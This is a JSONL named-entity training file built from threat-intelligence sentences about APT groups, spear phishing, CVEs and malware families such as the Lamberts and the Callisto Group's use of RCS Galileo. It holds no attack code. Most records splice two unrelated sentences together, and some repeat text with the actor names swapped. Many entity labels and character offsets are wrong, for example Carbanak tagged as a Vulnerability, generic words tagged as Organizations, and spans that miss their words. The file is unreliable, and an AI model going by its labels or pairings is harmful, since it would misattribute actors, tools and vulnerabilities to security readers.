{"text": "This exploit file made use of the same shellcode that we have observed Transparent Tribe use across a number of spear phishing incidents . This event significantly affected the Russian cybercriminal world as the gang had stolen hundreds of millions of rubles during a few years of activity , and was considered a \" leader \" among cybercriminals .", "spans": []}
{"text": "According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . In Russia , there were several relatively large cybercriminal groups engaged in financial theft via attacks on RBS .", "spans": [{"start": 17, "end": 30, "label": "Organization"}, {"start": 63, "end": 81, "label": "Organization"}, {"start": 153, "end": 179, "label": "Vulnerability"}]}
{"text": "Whitefly compromises its victims using custom malware alongside open-source hacking tools and living off the land tactics , such as malicious PowerShell scripts . In April 2013 , a year after we found the \" bodiless \" Lurk module , the Russian cybercriminal underground exploited several families of malicious software that specialized in attacks on banking software .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 142, "end": 160, "label": "System"}, {"start": 218, "end": 229, "label": "Malware"}]}
{"text": "After the demise of Storm , it was replaced by another new botnet known as Waledac that also leveraged peer-to-peer communications . Through the information exchanges used by people in the security industry , we learned that several Russian banks were struggling with malicious programs created specifically to attack a particular type of legal banking software .", "spans": [{"start": 75, "end": 82, "label": "System"}, {"start": 189, "end": 206, "label": "Organization"}, {"start": 241, "end": 246, "label": "Organization"}]}
{"text": "ESET recently analyzed a new Mac OS sample from the OceanLotus group that had been uploaded to VirusTotal . If it did , the malware downloaded additional modules , including ones allowing for the automatic creation of unauthorized payment orders , changing details in legal payment orders , etc .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 36, "end": 42, "label": "Malware"}, {"start": 52, "end": 62, "label": "Organization"}]}
{"text": "At this point , the attackers know the user has opened the document and send another spear-phishing email , this time containing an MS Word document with an embedded executable . As far as we can judge from the data we have , in 2014 the criminal group behind Lurk seriously reduced its activity and \" lived from hand to mouth \" , attacking anyone they could , including ordinary users .", "spans": [{"start": 20, "end": 29, "label": "Organization"}, {"start": 132, "end": 148, "label": "Malware"}, {"start": 260, "end": 264, "label": "Malware"}]}
{"text": "In one case from 2013 , the target was sent a malicious document through a spear phishing email message . In February 2015 , Kaspersky Lab 's Global Research and Analysis Team ( GReAT ) released its research into the Carbanak campaign targeting financial institutions .", "spans": [{"start": 46, "end": 64, "label": "Malware"}, {"start": 125, "end": 138, "label": "Organization"}, {"start": 178, "end": 183, "label": "Organization"}, {"start": 245, "end": 267, "label": "Organization"}]}
{"text": "The malware may communicate with its command and control (C2) server over The Onion Router (Tor) network if configured to do so . Since 2011 , the robbers had allegedly been stealing money directly from bank accounts in Russia and other countries of the Commonwealth of Independent States ( CIS ) by using a Trojan called Lurk .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 308, "end": 314, "label": "Malware"}, {"start": 322, "end": 326, "label": "Malware"}]}
{"text": "Harvested credentials provided by an embedded Mimikatz executable facilitate the infection of other systems on the network . which they launched targeted attacks against Russian banks , businesses and media companies .", "spans": [{"start": 46, "end": 54, "label": "Malware"}, {"start": 178, "end": 183, "label": "Organization"}, {"start": 186, "end": 196, "label": "Organization"}, {"start": 201, "end": 216, "label": "Organization"}]}
{"text": "This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . Lurk uses a form of steganography : that's where one file is hidden aACT inside another file of a completely different sort , such as an image , audio , or video file .", "spans": [{"start": 80, "end": 105, "label": "Malware"}, {"start": 138, "end": 151, "label": "Vulnerability"}, {"start": 166, "end": 178, "label": "System"}, {"start": 210, "end": 236, "label": "System"}, {"start": 239, "end": 242, "label": "System"}, {"start": 247, "end": 251, "label": "Malware"}]}
{"text": "This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . The latest version of Madi also has the ability to monitor the Russian social network Vkontakte ( VK ) along with the Jabber messaging platform to look for users who visit websites that contain words like \" USA \" , \" Skype \" , and \" gov \" .", "spans": [{"start": 84, "end": 109, "label": "Malware"}, {"start": 142, "end": 155, "label": "Vulnerability"}, {"start": 170, "end": 182, "label": "System"}, {"start": 214, "end": 240, "label": "System"}, {"start": 243, "end": 246, "label": "System"}]}
{"text": "The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors . Madi was found capturing computer screens , recording audio and stealing screenshots , keystrokes , documents and e-mail correspondence from \" Middle Eastern critical infrastructure engineering firms , government agencies , financial houses and academia .", "spans": [{"start": 4, "end": 13, "label": "Malware"}, {"start": 97, "end": 110, "label": "Vulnerability"}, {"start": 166, "end": 196, "label": "Vulnerability"}, {"start": 355, "end": 361, "label": "System"}, {"start": 399, "end": 440, "label": "Organization"}, {"start": 443, "end": 462, "label": "Organization"}, {"start": 465, "end": 481, "label": "Organization"}, {"start": 486, "end": 494, "label": "Organization"}]}
{"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . A timeline of new activity can be scoped out for the group , with the greatest number of related downloaders created by the developers in December 2011 , Feb and March of 2012 , followed by June of 2012 .", "spans": [{"start": 28, "end": 48, "label": "Organization"}, {"start": 90, "end": 123, "label": "Malware"}, {"start": 143, "end": 156, "label": "Vulnerability"}]}
{"text": "According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . it reports to was created on August 10 , 2011 .", "spans": [{"start": 17, "end": 30, "label": "Organization"}, {"start": 63, "end": 81, "label": "Organization"}, {"start": 153, "end": 179, "label": "Vulnerability"}]}
{"text": "PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . Since at least 2008 , The Lamberts have used multiple sophisticated attack tools against high-profile victims .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 82, "end": 102, "label": "Organization"}, {"start": 143, "end": 160, "label": "Vulnerability"}, {"start": 228, "end": 236, "label": "Malware"}]}
{"text": "The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . Longhorn , which we internally refer to as \" The Lamberts \" , first came to the attention of the ITSec community in 2014 , when our colleagues from FireEye discovered an attack using a zero day vulnerability ( CVE-2014-4148 ) .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 83, "end": 103, "label": "Organization"}, {"start": 144, "end": 161, "label": "Vulnerability"}, {"start": 248, "end": 260, "label": "Organization"}, {"start": 300, "end": 315, "label": "Organization"}, {"start": 351, "end": 358, "label": "Organization"}, {"start": 388, "end": 396, "label": "Vulnerability"}, {"start": 397, "end": 410, "label": "Vulnerability"}, {"start": 413, "end": 426, "label": "Vulnerability"}]}
{"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . The attack leveraged malware we called ' BlackLambert ' , which was used to target a high profile organization in Europe .", "spans": [{"start": 20, "end": 28, "label": "Vulnerability"}, {"start": 95, "end": 104, "label": "Organization"}, {"start": 145, "end": 163, "label": "Organization"}, {"start": 187, "end": 196, "label": "Organization"}, {"start": 240, "end": 252, "label": "Malware"}, {"start": 284, "end": 309, "label": "Organization"}]}
{"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . Their arsenal includes network-driven backdoors , several generations of modular backdoors , harvesting tools , and wipers .", "spans": [{"start": 20, "end": 28, "label": "Vulnerability"}, {"start": 95, "end": 104, "label": "Organization"}, {"start": 145, "end": 163, "label": "Organization"}, {"start": 187, "end": 196, "label": "Organization"}, {"start": 222, "end": 246, "label": "Malware"}, {"start": 272, "end": 289, "label": "Malware"}, {"start": 292, "end": 308, "label": "Malware"}, {"start": 315, "end": 321, "label": "Malware"}]}
{"text": "Alternatively , it is also possible that APT41 injected malicious code into the package prior to compilation , circumventing the need to steal the code-signing certificate and compile it on their own . The first time the Lambert family malware was uncovered publicly was in October 2014 , when FireEye posted a blog about a zero day exploit ( CVE-2014-4148 ) used in the wild .", "spans": [{"start": 41, "end": 46, "label": "Organization"}, {"start": 221, "end": 243, "label": "Malware"}, {"start": 294, "end": 301, "label": "Organization"}, {"start": 324, "end": 332, "label": "Vulnerability"}, {"start": 333, "end": 340, "label": "Vulnerability"}, {"start": 343, "end": 356, "label": "Vulnerability"}]}
{"text": "SectorJ04 used the spear phishing email to spread malicious Excel or malicious Word files , and downloaded the MSI files from the attacker\u2019s server when the malicious documents were run . Interestingly , while most Blue Lambert variants have version numbers in the range of 2.x , Green Lambert is mostly in 3.x versions .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 130, "end": 140, "label": "Organization"}, {"start": 215, "end": 227, "label": "Malware"}, {"start": 280, "end": 293, "label": "Malware"}]}
{"text": "Spam emails targeting email accounts used in the integrated mail service of public officials were also found in the hacking activity . While investigating one of these infections involving White Lambert ( network-driven implant ) and Blue Lambert ( active implant ) , we found yet another family of tools that appear to be related .", "spans": [{"start": 189, "end": 202, "label": "Malware"}, {"start": 234, "end": 246, "label": "Malware"}]}
{"text": "Instead of using fake Google Docs phishing pages to collect personal email login credentials , Scattered Canary began using phishing pages of commonly used business applications to compromise enterprise credentials . Versions of this particular orchestrator were found on other victims , together with White Lambert samples , indicating a close relationship between the White and Pink Lambert malware families .", "spans": [{"start": 95, "end": 111, "label": "Organization"}, {"start": 302, "end": 323, "label": "Malware"}, {"start": 370, "end": 375, "label": "Malware"}, {"start": 380, "end": 409, "label": "Malware"}]}
{"text": "During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros . While in most cases the infection vector remains unknown , the high profile attack from 2014 used a very complex Windows TTF zero-day exploit ( CVE-2014-4148 ) .", "spans": [{"start": 27, "end": 32, "label": "Organization"}, {"start": 74, "end": 99, "label": "Malware"}, {"start": 255, "end": 262, "label": "System"}, {"start": 267, "end": 275, "label": "Vulnerability"}, {"start": 276, "end": 283, "label": "Vulnerability"}, {"start": 286, "end": 299, "label": "Vulnerability"}]}
{"text": "Tactic #1: Delivering the miner directly to a vulnerable serverSome tactics we've observed involve exploiting CVE-2017-10271 , leveraging PowerShell to download the miner directly onto the victim\u2019s system (Figure 1) , and executing it using ShellExecute() . This migration activity was last observed in October 2016 .", "spans": [{"start": 110, "end": 124, "label": "Vulnerability"}, {"start": 138, "end": 148, "label": "System"}]}
{"text": "This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . Most of the Blue and Green Lambert samples have two C&C servers hardcoded in their configuration block : a hostname and an IP address .", "spans": [{"start": 80, "end": 105, "label": "Malware"}, {"start": 138, "end": 151, "label": "Vulnerability"}, {"start": 166, "end": 178, "label": "System"}, {"start": 210, "end": 236, "label": "System"}, {"start": 239, "end": 242, "label": "System"}, {"start": 259, "end": 289, "label": "Malware"}, {"start": 299, "end": 302, "label": "System"}, {"start": 370, "end": 372, "label": "Indicator"}]}
{"text": "This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . Some of the known filenames for Gray Lambert are mwapi32.dll and poolstr.dll \u2013 it should be pointed though that the filenames used by the Lamberts are generally unique and have never been used twice .", "spans": [{"start": 84, "end": 109, "label": "Malware"}, {"start": 142, "end": 155, "label": "Vulnerability"}, {"start": 170, "end": 182, "label": "System"}, {"start": 214, "end": 240, "label": "System"}, {"start": 243, "end": 246, "label": "System"}, {"start": 283, "end": 295, "label": "Malware"}, {"start": 300, "end": 311, "label": "Malware"}, {"start": 316, "end": 327, "label": "Malware"}, {"start": 389, "end": 397, "label": "Malware"}]}
{"text": "The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors . Black Lambert was seen only briefly and we assume it was \" retired \" from the arsenal after being discovered by FireEye in 2014 .", "spans": [{"start": 4, "end": 13, "label": "Malware"}, {"start": 97, "end": 110, "label": "Vulnerability"}, {"start": 166, "end": 196, "label": "Vulnerability"}, {"start": 241, "end": 254, "label": "Malware"}, {"start": 353, "end": 360, "label": "Organization"}]}
{"text": "According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . The Lamberts toolkit spans across several years , with most activity occurring in 2013 and 2014 .", "spans": [{"start": 17, "end": 30, "label": "Organization"}, {"start": 153, "end": 179, "label": "Vulnerability"}, {"start": 186, "end": 202, "label": "Malware"}]}
{"text": "PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . To further exemplify the proficiency of the attackers leveraging the Lamberts toolkit , deployment of Black Lambert included a rather sophisticated TTF zero day exploit , CVE-2014-4148 .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 143, "end": 160, "label": "Vulnerability"}, {"start": 271, "end": 287, "label": "Malware"}, {"start": 304, "end": 317, "label": "Malware"}, {"start": 354, "end": 362, "label": "Vulnerability"}, {"start": 363, "end": 370, "label": "Vulnerability"}, {"start": 373, "end": 386, "label": "Vulnerability"}]}
{"text": "The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . Taking that into account , we classify the Lamberts as the same level of complexity as Regin , ProjectSauron , Equation and Duqu2 , which makes them one of the most sophisticated Cyber Espionage toolkits we have ever analysed .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 144, "end": 161, "label": "Vulnerability"}, {"start": 246, "end": 254, "label": "Malware"}, {"start": 290, "end": 295, "label": "Malware"}, {"start": 298, "end": 311, "label": "Malware"}, {"start": 314, "end": 322, "label": "Malware"}, {"start": 327, "end": 332, "label": "Malware"}]}
{"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . Taking that into account , we classify the Lamberts as the same level of complexity as Regin , ProjectSauron , Equation and Duqu2 , which makes them one of the most sophisticated Cyber Espionage toolkits we have ever analysed .", "spans": [{"start": 20, "end": 28, "label": "Vulnerability"}, {"start": 95, "end": 104, "label": "Organization"}, {"start": 145, "end": 163, "label": "Organization"}, {"start": 242, "end": 250, "label": "Malware"}, {"start": 286, "end": 291, "label": "Malware"}, {"start": 294, "end": 307, "label": "Malware"}, {"start": 310, "end": 318, "label": "Malware"}, {"start": 323, "end": 328, "label": "Malware"}]}
{"text": "Should a user enable this content , Gallmaker is then able to use the DDE protocol to remotely execute commands in memory on the victima 's system . On January 15 , Confiant exposed the activity of the Zirconium group , spreading malicious ads via a network of fake ad agencies through 2017 , in what amounted to the largest malvertising campaign of recent times .", "spans": [{"start": 36, "end": 45, "label": "Organization"}, {"start": 70, "end": 82, "label": "System"}, {"start": 261, "end": 277, "label": "Organization"}]}
{"text": "These socially engineered emails contain web links of weaponized documents containing exploits or macros . Cadelle , uses Backdoor.Cadelspy .", "spans": [{"start": 122, "end": 139, "label": "Malware"}]}
{"text": "It contains an additional meta tag at the end of the web page source code , \" refreshing \" ( redirecting ) the site visitor to the weaponized document . Symantec telemetry identified Cadelle and Chafer activity dating from as far back as July 2014 , however , it's likely that activity began well before this date .", "spans": [{"start": 153, "end": 161, "label": "Organization"}]}
{"text": "Volexity has also found that , in addition to sending malware lures , the Patchwork threat actors are leveraging unique tracking links in their e-mails for the purpose of identifying which recipients opened their e-mail messages . Chafer , uses Backdoor.Remexi .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 74, "end": 97, "label": "Organization"}, {"start": 245, "end": 260, "label": "Malware"}]}
{"text": "At this point , the attackers know the user has opened the document and send another spear-phishing email , this time containing an MS Word document with an embedded executable . Cadelle 's threats are capable of opening a back door and stealing information from victims' computers .", "spans": [{"start": 20, "end": 29, "label": "Organization"}, {"start": 132, "end": 148, "label": "Malware"}]}
{"text": "The majority of the code for TINYTYPHON is taken from the MyDoom worm and has been repurposed to find and exfiltrate documents . Chafer , uses Backdoor.Remexi.B .", "spans": [{"start": 58, "end": 69, "label": "System"}, {"start": 143, "end": 160, "label": "Malware"}]}
{"text": "Pitty Tiger group is sometimes using stolen material as spear phishing content to target other persons . registrant information points to activity possibly as early as 2011 .", "spans": [{"start": 0, "end": 17, "label": "Organization"}]}
{"text": "The Pitty Tiger group mostly uses spear phishing in order to gain an initial foothold within the targeted environment . These threats are capable of opening a back door and stealing information from victims' computers .", "spans": [{"start": 4, "end": 21, "label": "Organization"}]}
{"text": "PittyTiger leverages social engineering to deliver spearphishing emails , in a variety of languages including English , French and Chinese , and email phishing pages to their targets . executable compilation times suggest early 2012 .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 21, "end": 39, "label": "Organization"}]}
{"text": "PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . It's unclear how Cadelle infects its targets with Backdoor.Cadelspy .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 82, "end": 102, "label": "Organization"}, {"start": 143, "end": 160, "label": "Vulnerability"}, {"start": 252, "end": 269, "label": "Malware"}]}
{"text": "The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . The affected organizations we were able to identify are mostly based in the Middle East .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 83, "end": 103, "label": "Organization"}, {"start": 144, "end": 161, "label": "Vulnerability"}]}
{"text": "PLATINUM often spear phishes its targets at their non-official or private email accounts , to use as a stepping stone into the intended organization 's network . one organization is located in the US .", "spans": [{"start": 0, "end": 8, "label": "Organization"}]}
{"text": "PLATINUM primarily targets its intended victims using spear phishing . There are a number of factors in these groups' campaigns that suggests that the attackers may be based in Iran .", "spans": [{"start": 0, "end": 8, "label": "Organization"}]}
{"text": "In August 2015 , the admin@338 sent spear phishing emails to a number of Hong Kong-based media organizations , including newspapers , radio , and television . Remexi is a basic back door Trojan that allows attackers to open a remote shell on the computer and execute commands .", "spans": [{"start": 21, "end": 30, "label": "Organization"}, {"start": 89, "end": 108, "label": "Organization"}, {"start": 159, "end": 165, "label": "Malware"}, {"start": 187, "end": 193, "label": "Malware"}]}
{"text": "In August 2015 , the threat actors sent spear phishing emails to a number of Hong Kong-based media organizations , including newspapers , radio , and television . Their primary interest appears to be gathering intelligence .", "spans": [{"start": 21, "end": 34, "label": "Organization"}, {"start": 93, "end": 112, "label": "Organization"}]}
{"text": "In August 2015 , the admin@338 sent spear phishing emails to a number of Hong Kong-based media organizations . This stands in opposition to the data gathered from export timestamps and C&C domain activity that points to Green Lambert being considerably older than the Blue variant .", "spans": [{"start": 21, "end": 30, "label": "Organization"}, {"start": 89, "end": 108, "label": "Organization"}, {"start": 220, "end": 233, "label": "Malware"}, {"start": 268, "end": 272, "label": "Malware"}]}
{"text": "The admin@338 previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences . security policy in the Eastern Europe and South Caucasus regions .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 42, "end": 51, "label": "Organization"}, {"start": 56, "end": 76, "label": "Organization"}, {"start": 165, "end": 174, "label": "Organization"}]}
{"text": "When the document was opened in Word , PLATINUM exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer . Callisto Group via credential phishingThese spear phishing emails were crafted to appear highly convincing , including being sent from legitimate email accounts suspected to have been previously compromised by the Callisto Group via credential phishing .", "spans": [{"start": 32, "end": 36, "label": "System"}, {"start": 39, "end": 47, "label": "Organization"}, {"start": 153, "end": 166, "label": "Vulnerability"}, {"start": 200, "end": 208, "label": "Organization"}, {"start": 341, "end": 347, "label": "System"}, {"start": 428, "end": 433, "label": "System"}]}
{"text": "n one case from 2013 , the target was sent a malicious document through a spear phishing email message . In early 2016 the Callisto Group began sending highly targeted spear phishing emails with malicious attachments that contained , as their final payload , the \" Scout \" malware tool from the HackingTeam RCS Galileo platform .", "spans": [{"start": 45, "end": 63, "label": "Malware"}, {"start": 183, "end": 189, "label": "System"}, {"start": 195, "end": 216, "label": "Indicator"}, {"start": 265, "end": 270, "label": "Malware"}]}
{"text": "According to FireEye , the admin@338 sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL . These spear phishing emails were crafted to appear highly convincing , including being sent from legitimate email accounts suspected to have been previously compromised by the Callisto Group via credential phishing .", "spans": [{"start": 13, "end": 20, "label": "Organization"}, {"start": 27, "end": 36, "label": "Organization"}, {"start": 104, "end": 136, "label": "Vulnerability"}, {"start": 187, "end": 194, "label": "System"}, {"start": 218, "end": 224, "label": "System"}, {"start": 305, "end": 310, "label": "System"}]}
{"text": "According to FireEye , the attackers sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL . Callisto Group appears to be intelligence gathering related to European foreign and security policy .", "spans": [{"start": 13, "end": 20, "label": "Organization"}, {"start": 27, "end": 36, "label": "Organization"}, {"start": 104, "end": 136, "label": "Vulnerability"}, {"start": 187, "end": 194, "label": "System"}]}
{"text": "This week the experts at FireEye discovered that a group of Chinese-based hackers called admin@338 had sent multiple MH370-themed spear phishing emails , the attackers targeted government officials in Asia-Pacific , it is likely for cyber espionage purpose . some indications of loosely linked activity dating back to at least 2013 .", "spans": [{"start": 25, "end": 32, "label": "Organization"}, {"start": 51, "end": 56, "label": "Organization"}, {"start": 74, "end": 81, "label": "Organization"}, {"start": 89, "end": 98, "label": "Organization"}, {"start": 158, "end": 167, "label": "Organization"}, {"start": 177, "end": 197, "label": "Organization"}, {"start": 233, "end": 248, "label": "Organization"}]}
{"text": "The group previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences . In October 2015 , the Callisto Group was observed sending targeted credential phishing emails .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 38, "end": 47, "label": "Organization"}, {"start": 52, "end": 72, "label": "Organization"}, {"start": 161, "end": 170, "label": "Organization"}, {"start": 195, "end": 209, "label": "Organization"}, {"start": 260, "end": 266, "label": "System"}]}
{"text": "On November 26 , 2015 , a suspected China-based APT16 sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies . In early 2016 , the Callisto Group was observed sending targeted spear phishing emails .", "spans": [{"start": 48, "end": 53, "label": "Organization"}, {"start": 133, "end": 142, "label": "Organization"}, {"start": 147, "end": 166, "label": "Organization"}, {"start": 249, "end": 255, "label": "System"}]}
{"text": "On November 26 , 2015 , a suspected China-based APT group sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies . The malicious attachments purported to be invitations or drafts of the agenda for the conference .", "spans": [{"start": 48, "end": 57, "label": "Organization"}, {"start": 137, "end": 146, "label": "Organization"}, {"start": 151, "end": 170, "label": "Organization"}, {"start": 177, "end": 198, "label": "Indicator"}, {"start": 215, "end": 226, "label": "Malware"}, {"start": 230, "end": 250, "label": "Malware"}]}
{"text": "APT16 actors sent spear phishing emails to two Taiwanese media organizations . Based on our analysis of Callisto Group 's usage of RCS Galileo , we believe the Callisto Group did not utilize the leaked RCS Galileo source code , but rather used the leaked readymade installers to set up their own installation of the RCS Galileo platform .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 57, "end": 76, "label": "Organization"}, {"start": 104, "end": 118, "label": "Organization"}, {"start": 265, "end": 275, "label": "Malware"}]}
{"text": "On the same date that APT16 targeted Taiwanese media , suspected Chinese APT actors also targeted a Taiwanese government agency , sending a lure document that contained instructions for registration and subsequent listing of goods on a local Taiwanese auction website . In the known spear phishing attacks by the Callisto Group , they employed the \" Scout \" malware tool from the RCS Galileo platform .", "spans": [{"start": 22, "end": 27, "label": "Organization"}, {"start": 47, "end": 52, "label": "Organization"}, {"start": 73, "end": 83, "label": "Organization"}, {"start": 110, "end": 127, "label": "Organization"}, {"start": 313, "end": 327, "label": "Organization"}, {"start": 350, "end": 355, "label": "Malware"}, {"start": 384, "end": 391, "label": "Organization"}]}
{"text": "APT28 targets Russian rockers and dissidents Pussy Riot via spear-phishing emails . We are confident the Callisto Group used this type of access to a target 's email account for the purposes of sending spear phishing to other targets .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 22, "end": 29, "label": "Organization"}, {"start": 34, "end": 44, "label": "Organization"}, {"start": 160, "end": 165, "label": "System"}]}
{"text": "In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe , \" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia . If a target of the spear phishing described in \" Phase 2 : malware deployment \" opened the email attachment and , crucially , clicked on the icon in the attachment , this would lead to the target 's computer becoming infected with the \" Scout \" malware tool from the RCS Galileo platform .", "spans": [{"start": 10, "end": 15, "label": "Organization"}, {"start": 114, "end": 125, "label": "Malware"}, {"start": 185, "end": 193, "label": "Organization"}, {"start": 451, "end": 456, "label": "Malware"}]}
{"text": "In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe \" . Callisto Group and related infrastructure contain links to at least Russia , Ukraine , and China .", "spans": [{"start": 10, "end": 15, "label": "Organization"}, {"start": 114, "end": 125, "label": "Malware"}]}
{"text": "APT33 sent spear phishing emails to employees whose jobs related to the aviation industry . they have been last known to employ malware in February 2016 .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 36, "end": 45, "label": "Organization"}, {"start": 72, "end": 89, "label": "Organization"}]}
{"text": "It is possible that APT37 's distribution of KARAE malware via torrent websites could assist in creating and maintaining botnets for future distributed denial-of-service ( DDoS ) attacks , or for other activity such as financially motivated campaigns or disruptive operations . RCS Galileo platform .", "spans": [{"start": 20, "end": 25, "label": "Organization"}, {"start": 45, "end": 58, "label": "System"}]}
{"text": "In May 2017 , APT37 used a bank liquidation letter as a spear phishing lure against a board member of a Middle Eastern financial company . The spear phishing emails used in the known attacks by the Callisto Group were so convincing that even skilled and alert users would likely have attempted to open the malicious attachment .", "spans": [{"start": 14, "end": 19, "label": "Organization"}, {"start": 86, "end": 98, "label": "Organization"}, {"start": 119, "end": 136, "label": "Organization"}, {"start": 158, "end": 164, "label": "System"}, {"start": 198, "end": 212, "label": "Organization"}]}
{"text": "Operation Daybreak appears to have been launched by unknown attackers to infect high profile targets through spear-phishing e-mails . In October 2015 the Callisto Group targeted a handful of individuals with phishing emails that attempted to obtain the target 's webmail credentials .", "spans": [{"start": 60, "end": 69, "label": "Organization"}, {"start": 217, "end": 223, "label": "System"}]}
{"text": "Operation Daybreak appears to have been launched by APT37 to infect high profile targets through spear-phishing e-mails . The Callisto Group has been active at least since late 2015 and continues to be so , including continuing to set up new phishing infrastructure every week .", "spans": [{"start": 52, "end": 57, "label": "Organization"}]}
{"text": "BRONZE BUTLER has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems . Called Greenbug , this group is believed to be instrumental in helping Shamoon steal user credentials of targets ahead of Shamoon 's destructive attacks .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 69, "end": 91, "label": "Vulnerability"}]}
{"text": "The group has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems . On Tuesday , Arbor Networks said that it has new leads on a credential stealing remote access Trojan ( RAT ) called Ismdoor , possibly used by Greenbug to steal credentials on Shamoon 's behalf .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 65, "end": 87, "label": "Vulnerability"}, {"start": 260, "end": 274, "label": "Organization"}, {"start": 341, "end": 347, "label": "Malware"}, {"start": 350, "end": 353, "label": "Malware"}, {"start": 363, "end": 370, "label": "Malware"}]}
{"text": "BRONZE BUTLER has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks . \" With our latest research we now see how Greenbug has shifted aACT from HTTP-based C2 communication with Ismdoor .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 96, "end": 110, "label": "System"}, {"start": 136, "end": 150, "label": "Vulnerability"}, {"start": 253, "end": 255, "label": "System"}, {"start": 275, "end": 282, "label": "Malware"}]}
{"text": "The group has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks . It's now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware \" , said Dennis Schwarz , research analyst on Arbor 's ASERT Team , in an interview with Threatpost .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 92, "end": 106, "label": "System"}, {"start": 132, "end": 146, "label": "Vulnerability"}, {"start": 191, "end": 217, "label": "Malware"}, {"start": 348, "end": 367, "label": "Organization"}]}
